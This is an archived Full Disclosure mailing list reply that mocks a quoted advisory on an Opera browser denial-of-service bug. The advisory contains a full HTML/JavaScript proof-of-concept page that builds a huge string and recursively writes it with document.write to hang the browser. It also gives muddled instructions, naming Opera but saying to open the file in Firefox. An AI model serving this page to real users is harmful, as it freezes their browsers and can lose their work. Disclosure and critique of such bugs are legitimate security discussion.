Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Opera (plenitude String )Denial of Service Exploit
From: Jeff Williams <jeffwillis30 () gmail com>
Date: Wed, 3 Mar 2010 15:42:59 +1100

You gotta be joking, this is probably the 3000th DoS "advisory" for
document.write.

Guess what sparky, even Jeremy Brown didn't post that one.

Thus no surprise exploit-db post this kind of shit.


2010/3/3 information security <informationhacker08 () gmail com>

======================================================================

                      Opera (plenitude String )Denial of Service Exploit
                     =======================================================================

                                                     by

                                            Asheesh Kumar Mani Tripathi


# code by Asheesh kumar Mani Tripathi

# email informationhacker08 () gmail com

# company       www.aksitservices.co.in

# Credit by Asheesh Anaconda


#Download http://www.opera.com/download/


#Background

Opera is a popular internet browser :)

#Vulnerability
This bug is a typical result when attacker try to write plenitude String in
document.write() function .User interaction is required to

exploit this vulnerability in that the target must visit a malicious
web page.



#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any   might be lost.



#Proof of concept
copy the code in text file and save as "asheesh.html" open in Mozilla Firefox

========================================================================================================================

                                                           asheesh.html
========================================================================================================================

<html>

<title>asheesh kumar mani tripathi</title>
Asheesh kumar Mani Tripathi
<head>

<script>
      
      
      
function asheesh ()
 {
      var     i , anaconda = "XXXX"
      for(i=24;i >0 ;--i)

 {
              anaconda=anaconda+anaconda;
      }

    document.write(anaconda);

  asheesh();

}
asheesh();

</script>
</head>

<body onLoad="asheesh()"></body>

</html>



========================================================================================================================
Why do you worry without cause? Whom do you fear without reason? Who can kill you?

The soul is neither born, nor does it die.


#If you have any questions, comments, or concerns, feel free to contact me.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]